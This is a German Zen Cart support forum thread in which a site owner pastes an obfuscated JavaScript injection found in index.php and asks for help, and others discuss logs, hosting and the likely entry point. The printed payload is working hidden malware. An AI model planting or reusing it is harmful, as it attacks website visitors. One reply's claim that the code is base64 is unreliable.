Ankündigung

Einklappen
Keine Ankündigung bisher.

Schadcode eingespielt !!!

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

    Schadcode eingespielt !!!

    Hallo Gemeinde,

    leider hat es doch jemand geschafft auch auf meiner Internetpräsenz einen Schadcode einzuspielen.

    Gemerkt habe ich das durch das verschobene CSS-Design und das der Hinweis auf den Log der IP nicht mehr zu sehen ist. Leider habe ich keine Ahnung davon, was mir da eingespielt wurde. Ich habe den Code mal kopiert. Vielleicht kann mir jemand weiterhelfen, auf welchem Weg das Teil auf meinen Server gekommen ist und was es eigentlich macht?

    Code:
    echo "                                                                                                                                                                                                                                                                                                       <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                            try{window.document.body++}catch(gdsgsdg){dbshre=244;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,106,97,113,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,103,99,115,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,92,105,91,97,99,114,88,100,103,95,111,105,93,108,93,100,37,91,104,103,42,107,106,90,96,41,103,96,105,33,54,4,2,25,26,27,23,103,99,115,41,106,108,114,102,96,37,104,104,109,100,107,97,104,104,27,52,24,32,91,93,106,103,101,111,111,92,31,52,7,5,23,24,25,26,106,97,113,39,109,111,112,100,94,40,93,102,106,93,95,109,23,53,25,33,43,30,51,6,4,27,23,24,25,105,101,112,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,106,97,113,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,106,97,113,39,109,111,112,100,94,40,103,92,94,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,105,101,112,38,108,110,116,99,93,39,110,106,103,24,54,26,34,40,104,113,33,54,4,2,6,4,27,23,24,25,99,97,23,32,26,94,106,90,109,102,95,105,107,38,96,95,111,60,100,94,103,96,101,108,59,115,68,91,32,32,105,101,112,31,34,35,27,114,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,104,100,116,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,104,100,116,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,102,98,114,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s=\"\";for(i=0;i-474!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";
    An dieser Stelle..

    MFG COLOSSOS

    #2
    Mit diesem Code fängt niemand was an und anhand dieses Codes kann niemand sagen, wie das gemacht wurde

    Wichtiger wäre:
    - In welcher Datei hast Du diesen Code gefunden?
    - Wurden auch andere Dateien verändert?
    - Bei welchem Provider bis Du?
    - Was sagt der Provider dazu?
    - Laufen auf dem Webspace noch andere Systeme?
    - Was sagen die Zugriffslogfiles vom Zeitpunkt der Veränderung? Darin ist ersichtlich, ob das per FTP gemacht wurde.

    Kommentar


      #3
      Schadcode

      Hallo Webchills,

      der Provider ist diesem Fall Alfahosting. Und ja es waren mehrere Webseiten betroffen.

      • Auch die gehosteten Server eines Bekannten waren betroffen.
      • Der Provider hüllt sich bisher in Schweigen und sagt es wäre nicht sein Fehler.
      • Die Admin Logins in Zen Cart lassen nicht auf einen unautorisierten Zugriff schließen.
      • Der Schadcode war direkt auf der index.php eingespielt. Ich kann nicht sagen, wie viele Dateien im admin oder der includes betroffen waren, aber es waren einige. Das Austauschen der index allein brachte keine Veränderung. Daher habe ich mich dazu entschieden das ganze System neu aufzuspielen.
      • FTP Logs werde ich noch checken und berichten.
      • Beim Durchsuchen habe ich keine schadhaften Skripte oder ähnliches entdeckt. (Jedenfalls nicht offensichtlich)


      Ich fragte ja nur, ob jemand sowas schon mal gesehen hat, weil ich aus der Anreihung der Zahlen mir kein Bild machen konnte.
      Nun ja wie das so immer ist: Was man nicht weiß, will man trotzdem verstehen.

      MFG COLOSSOS

      Kommentar


        #4
        Den code ist adware, es sollte ein popup kommen mit etwas wie:

        Gratuliert Sie haben ein iPhone gewonnen...

        die ziffern sind base64 encoded html

        Den satz wirst du ungefähr in jeden index.php Datei bei dir finden. Vielleicht auch noch in de .js Dateien abhängig davon ob es die neuere Version ist oder die alte.

        Die Leute suchen eichtlich nach etwas ältere WordPress installs und/oder CMS MS, wenn du die da drauf hast dan bitte die auf ein andere Server stellen.

        Kommentar


          #5
          Schadcode

          @ entje

          hast du recht gehabt. Der Schadcode befand sich in etlichen Dateien. Aber ein Popup kam nicht. Lediglich war das CSS Design bei allen meinen Homepage Templates verschoben und hat dafür gesorgt das bei jedem Besuch der Webseiten Zone Alarm angesprungen ist.

          Verzeih mir meine Unwissenheit, aber was meinst du mit alten Word press und cms ms ???? Wo soll ich da suchen, bzw. was sind die Schritte??

          MFG COLOSSOS

          Kommentar


            #6
            Stimmt, den pop-up kommt nicht bei Zen Cart.

            Die ältere WordPress oder CMS MS brauchen nicht auf dein Teil vom Server zu stehen wenn du auf shared hosting bist, kann auch von ein deiner hunderte Nachbarn sein.

            Kommentar


              #7
              SO - Nachträgliche Info ...

              Ich habe mir noch mal die Arbeit gemacht und die Verseuchten Dateien durchgeforstet. Der Schadcode wurde definitiv über den /images Ordner in das system gebracht. (Die dort angelegte HTML würde verändert)

              Entweder ist mir da selbst ein Fehler unterlaufen (Ordnerrechte falsch gesetzt) oder es gibt da noch ein Schlupfloch..

              MFG COLOSSOS

              Kommentar

              Info zu diesem Forenarchiv:
              Mit Release von 1.5.7 wurde die deutsche Zen Cart Version auf eine reine DIY-Lösung umgestellt.
              Für einen Support via Forum stehen keine personellen und zeitlichen Ressourcen mehr zur Verfügung.
              Dieses Supportforum bleibt im Nur-Lesen-Modus als Wissensarchiv noch online verfügbar.
              PM Funktionalität, Registrierung und Posten neuer Beiträge sind deaktiviert.
              Zugriff auf Anhänge in den Postings ist auch ohne Registrierung/Einloggen möglich.
              FAQ und Downloadbereich des Forums wurden in die neue umfangreiche Knowledgebase auf der zen-cart-pro.at Website übernommen.

              Das Development der deutschen Zen Cart Version geht wie bisher auf Github weiter.
              Wir werden auch weiterhin neue Versionen bereitstellen und die Onlinedokumentation/Knowledgebase aktualisieren.
              Fehler in der Software können auf Github als Issues gemeldet werden.
              Follow us
              aktuelle version
              Zen Cart 1.5.7 deutsch
              vom 20.05.2022
              [Download]
              Lädt...
              X